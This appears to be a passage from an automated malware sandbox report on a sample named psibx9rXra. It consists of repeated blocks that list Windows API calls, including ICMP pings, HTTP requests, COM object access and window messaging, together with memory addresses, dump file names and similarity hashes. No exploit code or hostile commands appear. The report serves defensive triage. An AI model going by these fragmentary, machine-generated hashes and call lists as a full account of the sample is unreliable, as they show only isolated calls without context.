                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                • String ID:
                                                • API String ID: 4176008265-0
                                                • Opcode ID: 0b58863f879d2921d18299010cf9bae4a05f6674200ed4931da0ffaecb0aa6f6
                                                • Instruction ID: 9bebe83da50aeee3b7183eadcc6c77fc550ab080c8a565f3438db7bb3de6d93a
                                                • Opcode Fuzzy Hash: 0b58863f879d2921d18299010cf9bae4a05f6674200ed4931da0ffaecb0aa6f6
                                                • Instruction Fuzzy Hash: 7061C0B090028AAFDB61CF65CD88EBE7BBCFB01314F140159F842A3250E736AD05EB21
                                                APIs
                                                • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 01006FA5
                                                • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 01006FA8
                                                • GetWindowLongW.USER32(?,000000F0), ref: 01006FCC
                                                • _memset.LIBCMT ref: 01006FDD
                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 01006FEF
                                                • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 01007067
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: MessageSend$LongWindow_memset
                                                • String ID:
                                                • API String ID: 830647256-0
                                                • Opcode ID: 07276ed6eb169ba3ca485792612ae2e45b390f17d78e2999e2d0ce22805bf114
                                                • Instruction ID: 6bdf4d27835673d9c557dac9cf94e13ac86deeef4f36b648aba290b75faa4044
                                                • Opcode Fuzzy Hash: 07276ed6eb169ba3ca485792612ae2e45b390f17d78e2999e2d0ce22805bf114
                                                • Instruction Fuzzy Hash: 19617075900208AFEB21DFA8CC81EEE77F9EF09710F100199FA94AB2D1C775A951DB90
                                                APIs
                                                • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00FD6BBF
                                                • SafeArrayAllocData.OLEAUT32(?), ref: 00FD6C18
                                                • VariantInit.OLEAUT32(?), ref: 00FD6C2A
                                                • SafeArrayAccessData.OLEAUT32(?,?), ref: 00FD6C4A
                                                • VariantCopy.OLEAUT32(?,?), ref: 00FD6C9D
                                                • SafeArrayUnaccessData.OLEAUT32(?), ref: 00FD6CB1
                                                • VariantClear.OLEAUT32(?), ref: 00FD6CC6
                                                • SafeArrayDestroyData.OLEAUT32(?), ref: 00FD6CD3
                                                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00FD6CDC
                                                • VariantClear.OLEAUT32(?), ref: 00FD6CEE
                                                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00FD6CF9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                • String ID:
                                                • API String ID: 2706829360-0
                                                • Opcode ID: 35628a9d5420ad3e8475291b41bd55ba5ce479e93ab8d14c6af5305c6d979650
                                                • Instruction ID: 72108855df2caeb0947fcceef7a7daf9b5086f55677d1bae13fce413c63675b0
                                                • Opcode Fuzzy Hash: 35628a9d5420ad3e8475291b41bd55ba5ce479e93ab8d14c6af5305c6d979650
                                                • Instruction Fuzzy Hash: 88418031A0021A9FCF10DFA8D8849ADBBBAFF08350F05806AE955E7351CB35A945EF90
                                                APIs
                                                • WSAStartup.WSOCK32(00000101,?), ref: 00FF5793
                                                • inet_addr.WSOCK32(?,?,?), ref: 00FF57D8
                                                • gethostbyname.WSOCK32(?), ref: 00FF57E4
                                                • IcmpCreateFile.IPHLPAPI ref: 00FF57F2
                                                • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00FF5862
                                                • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00FF5878
                                                • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00FF58ED
                                                • WSACleanup.WSOCK32 ref: 00FF58F3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                • String ID: Ping
                                                • API String ID: 1028309954-2246546115
                                                • Opcode ID: 2fbc3947fe6d8e711cd463ae8bf64453fbfc0790293b2aa8453d173708b4e82d
                                                • Instruction ID: b877bd83c2d0ad48cd0ec48832f69f693a471a3598eeca8ce516593aea7199ff
                                                • Opcode Fuzzy Hash: 2fbc3947fe6d8e711cd463ae8bf64453fbfc0790293b2aa8453d173708b4e82d
                                                • Instruction Fuzzy Hash: AC51A0316047059FDB20EF24DC45B7A7BE4EF49B60F044529FA96DB2A1DB74E800EB42
                                                APIs
                                                • SetErrorMode.KERNEL32(00000001), ref: 00FEB4D0
                                                • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00FEB546
                                                • GetLastError.KERNEL32 ref: 00FEB550
                                                • SetErrorMode.KERNEL32(00000000,READY), ref: 00FEB5BD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: Error$Mode$DiskFreeLastSpace
                                                • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                • API String ID: 4194297153-14809454
                                                • Opcode ID: e191a116eb22617cf581c286a0ba2be46d3dd44b4ee2297a37778215f86afc35
                                                • Instruction ID: 583fa257cc1f4424c98819ac5e76307f8daec01a674240b1b56b4e58094fc453
                                                • Opcode Fuzzy Hash: e191a116eb22617cf581c286a0ba2be46d3dd44b4ee2297a37778215f86afc35
                                                • Instruction Fuzzy Hash: FA31E035A003469FCB14EB69CC85ABE77B8EF48310F18816AF501DB295CB759A41EB80
                                                APIs
                                                  • Part of subcall function 00F87DE1: _memmove.LIBCMT ref: 00F87E22
                                                  • Part of subcall function 00FDAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00FDAABC
                                                • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00FD9014
                                                • GetDlgCtrlID.USER32 ref: 00FD901F
                                                • GetParent.USER32 ref: 00FD903B
                                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 00FD903E
                                                • GetDlgCtrlID.USER32(?), ref: 00FD9047
                                                • GetParent.USER32(?), ref: 00FD9063
                                                • SendMessageW.USER32(00000000,?,?,00000111), ref: 00FD9066
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                • String ID: ComboBox$ListBox
                                                • API String ID: 1536045017-1403004172
                                                • Opcode ID: 1d8773b103202a51eed2ef55c5de4bec6951b0cfa8365cc02fb17b4ff2bb58c3
                                                • Instruction ID: 489d50c24b1d24eb265e0333bfb3f13f7b54060ee93bf9b699fa76b95cdb8a0b
                                                • Opcode Fuzzy Hash: 1d8773b103202a51eed2ef55c5de4bec6951b0cfa8365cc02fb17b4ff2bb58c3
                                                • Instruction Fuzzy Hash: 5421F475A00109BBDF11ABB0CC85EFEBB75EF49310F10021AF961972A1DF798819EB20
                                                APIs
                                                  • Part of subcall function 00F87DE1: _memmove.LIBCMT ref: 00F87E22
                                                  • Part of subcall function 00FDAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00FDAABC
                                                • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00FD90FD
                                                • GetDlgCtrlID.USER32 ref: 00FD9108
                                                • GetParent.USER32 ref: 00FD9124
                                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 00FD9127
                                                • GetDlgCtrlID.USER32(?), ref: 00FD9130
                                                • GetParent.USER32(?), ref: 00FD914C
                                                • SendMessageW.USER32(00000000,?,?,00000111), ref: 00FD914F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                • String ID: ComboBox$ListBox
                                                • API String ID: 1536045017-1403004172
                                                • Opcode ID: dd7175c784b8159f8cf084f9763774ad578f1b2bf9aa14d506cacc8419b828c3
                                                • Instruction ID: 07f4c5a7b3be1d4b9b9806677dca82a060e60c4b4c311305c8cd1b18514d013f
                                                • Opcode Fuzzy Hash: dd7175c784b8159f8cf084f9763774ad578f1b2bf9aa14d506cacc8419b828c3
                                                • Instruction Fuzzy Hash: 7721D675A00105BBDF11ABB0CC85FFEBB79EF48300F140116F551972A5DB798419EB20
                                                APIs
                                                • GetParent.USER32 ref: 00FD916F
                                                • GetClassNameW.USER32(00000000,?,00000100), ref: 00FD9184
                                                • _wcscmp.LIBCMT ref: 00FD9196
                                                • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00FD9211
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: ClassMessageNameParentSend_wcscmp
                                                • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                • API String ID: 1704125052-3381328864
                                                • Opcode ID: 25d7984a013f8f5b5f34af6d213c276da3bf827a9c5b34625b56b2d1453b7185
                                                • Instruction ID: c2d6d270f8cf701cbac6c6ba7e12c6c96b16a2c249e4611529a028522cdd57d0
                                                • Opcode Fuzzy Hash: 25d7984a013f8f5b5f34af6d213c276da3bf827a9c5b34625b56b2d1453b7185
                                                • Instruction Fuzzy Hash: A1118CB774C307BAFA212668DC0BEA7379DDB16330F20011BF900E5191FEE6A9517A90
                                                APIs
                                                • VariantInit.OLEAUT32(?), ref: 00FF88D7
                                                • CoInitialize.OLE32(00000000), ref: 00FF8904
                                                • CoUninitialize.OLE32 ref: 00FF890E
                                                • GetRunningObjectTable.OLE32(00000000,?), ref: 00FF8A0E
                                                • SetErrorMode.KERNEL32(00000001,00000029), ref: 00FF8B3B
                                                • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,01012C0C), ref: 00FF8B6F
                                                • CoGetObject.OLE32(?,00000000,01012C0C,?), ref: 00FF8B92
                                                • SetErrorMode.KERNEL32(00000000), ref: 00FF8BA5
                                                • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00FF8C25
                                                • VariantClear.OLEAUT32(?), ref: 00FF8C35
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                • String ID:
                                                • API String ID: 2395222682-0
                                                • Opcode ID: ab22c44c2713a8c1c156068beb53dff1d580120d82ef94464b601f1b81cd515e
                                                • Instruction ID: 9261c63d4748c96889c8fa18a5b2061ef80721eff4944796ed4ec06629cd24f7
                                                • Opcode Fuzzy Hash: ab22c44c2713a8c1c156068beb53dff1d580120d82ef94464b601f1b81cd515e
                                                • Instruction Fuzzy Hash: F5C14871608309AFC700EF64C88496BB7E9FF89388F04491DF6859B260DB75ED06DB52
                                                APIs
                                                • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00FE7A6C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: ArraySafeVartype
                                                • String ID:
                                                • API String ID: 1725837607-0
                                                • Opcode ID: 73841a2963d5f6008d796891a5173fad51a3e12328b4fe8e457b958c360901c6
                                                • Instruction ID: 0cba7691537844071827cca7d44c02ce9b05880615fee7b1efe45a131a83d06e
                                                • Opcode Fuzzy Hash: 73841a2963d5f6008d796891a5173fad51a3e12328b4fe8e457b958c360901c6
                                                • Instruction Fuzzy Hash: EBB1B27190834A9FDB11EF99D884BBEB7B8FF49320F240425EA41E7241D738E941EB91
                                                APIs
                                                • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00F8FAA6
                                                • OleUninitialize.OLE32(?,00000000), ref: 00F8FB45
                                                • UnregisterHotKey.USER32(?), ref: 00F8FC9C
                                                • DestroyWindow.USER32(?), ref: 00FC45D6
                                                • FreeLibrary.KERNEL32(?), ref: 00FC463B
                                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00FC4668
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                • String ID: close all
                                                • API String ID: 469580280-3243417748
                                                • Opcode ID: 37a8955ffe78b8514bd8849229baaf7ac53a93a7498624cece8b809b158bf3ca
                                                • Instruction ID: 6a828033dc7dfe9b58eb472c6d36e206f8dd53b8ca21a4767bfeb8ccbd81d898
                                                • Opcode Fuzzy Hash: 37a8955ffe78b8514bd8849229baaf7ac53a93a7498624cece8b809b158bf3ca
                                                • Instruction Fuzzy Hash: 42A16D317012138FDB29EF14CAA5FA9F364AF05710F5442ADE80AAB255DB34AD1AEF50
                                                APIs
                                                • EnumChildWindows.USER32(?,00FDA439), ref: 00FDA377
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: ChildEnumWindows
                                                • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                • API String ID: 3555792229-1603158881
                                                • Opcode ID: ea48abeeea271a89d6cc365e8f775ddd9a43582d170982150ead06ebec70ab70
                                                • Instruction ID: c8c56badeed5ee78baea1c1aea5bdb396e68756dac8352b568ecdc6ab46c7bf8
                                                • Opcode Fuzzy Hash: ea48abeeea271a89d6cc365e8f775ddd9a43582d170982150ead06ebec70ab70
                                                • Instruction Fuzzy Hash: 5191C771900606ABCB08EFA0C841BEDFB76BF05310F58811BE459A7341DF35A999FB95
                                                APIs
                                                • SetWindowLongW.USER32(?,000000EB), ref: 00F82EAE
                                                  • Part of subcall function 00F81DB3: GetClientRect.USER32(?,?), ref: 00F81DDC
                                                  • Part of subcall function 00F81DB3: GetWindowRect.USER32(?,?), ref: 00F81E1D
                                                  • Part of subcall function 00F81DB3: ScreenToClient.USER32(?,?), ref: 00F81E45
                                                • GetDC.USER32 ref: 00FBCD32
                                                • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00FBCD45
                                                • SelectObject.GDI32(00000000,00000000), ref: 00FBCD53
                                                • SelectObject.GDI32(00000000,00000000), ref: 00FBCD68
                                                • ReleaseDC.USER32(?,00000000), ref: 00FBCD70
                                                • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00FBCDFB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                • String ID: U
                                                • API String ID: 4009187628-3372436214
                                                • Opcode ID: ad2888fe68b4ada478d6daa4d142e018c089c220cc7d6ef458a06ce3da33c92f
                                                • Instruction ID: 0ecac23665b029cdcda049c8ca97b25226445e9315826379d4cad0678bf0382f
                                                • Opcode Fuzzy Hash: ad2888fe68b4ada478d6daa4d142e018c089c220cc7d6ef458a06ce3da33c92f
                                                • Instruction Fuzzy Hash: DD71C035900205DFCF21DF65C884AEB7BB5FF48320F14426AEDA55A296C7319881EFA0
                                                APIs
                                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00FF1A50
                                                • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00FF1A7C
                                                • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00FF1ABE
                                                • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00FF1AD3
                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00FF1AE0
                                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00FF1B10
                                                • InternetCloseHandle.WININET(00000000), ref: 00FF1B57
                                                  • Part of subcall function 00FF2483: GetLastError.KERNEL32(?,?,00FF1817,00000000,00000000,00000001), ref: 00FF2498
                                                  • Part of subcall function 00FF2483: SetEvent.KERNEL32(?,?,00FF1817,00000000,00000000,00000001), ref: 00FF24AD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                • String ID:
                                                • API String ID: 2603140658-3916222277
                                                • Opcode ID: bd56466f1af1b4c3ac63c4b2a679a107ca7282ff9011c4ea67dd9339b9c60463
                                                • Instruction ID: f041af96d6818a59005b0c4da021aa705c5757c99c3ac0e6318664699d380e6a
                                                • Opcode Fuzzy Hash: bd56466f1af1b4c3ac63c4b2a679a107ca7282ff9011c4ea67dd9339b9c60463
                                                • Instruction Fuzzy Hash: C94180B1901209FFEB228F50CC89FBA77ACFF08350F004116FB059A155E7B99E44ABA1
                                                APIs
                                                • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0100F910), ref: 00FF8D28
